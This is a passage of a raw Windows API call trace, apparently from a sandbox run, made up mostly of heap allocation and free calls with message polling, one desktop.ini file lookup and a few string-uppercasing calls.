0x2a77d78 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0205.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0205.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0205.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0205.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.627] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0205.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0205.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0205.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0205.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0205.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0205.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0205.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0205.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0205.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0205.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0205.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0205.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0205.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0205.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e2238 [0205.631] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0205.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0205.633] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0205.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa948 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0205.633] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0205.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0205.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0205.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0205.634] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0205.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0205.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0205.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0205.635] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0205.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab28 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0205.635] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0205.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0205.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0205.635] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0205.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0205.636] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0205.636] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0205.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.637] 